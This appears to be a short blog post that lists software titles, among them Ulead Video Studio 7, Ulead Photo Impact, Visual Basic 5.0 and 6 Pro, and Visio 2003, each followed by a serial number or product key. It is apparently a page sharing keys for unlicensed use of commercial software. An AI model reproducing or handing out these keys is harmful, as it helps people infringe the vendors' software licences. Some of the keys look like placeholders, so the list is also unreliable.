ULEAD VIDEO STUDIO 7
RORA2-870RO-ROROROR1
ULEAD PHOTO IMPACT
11103-07000-00001531S
VCD CUTER V.4.03 RETAIL
017697-023393
VISUAL BASIC 5.0
425-1689004
VISUAL BASIC 6 PRO
422-1111111
VISIO 2003
WFDWY-XQXJF-RHRYG-BG7RQ-BBHDM
Subscribe to:
Posts (Atom)



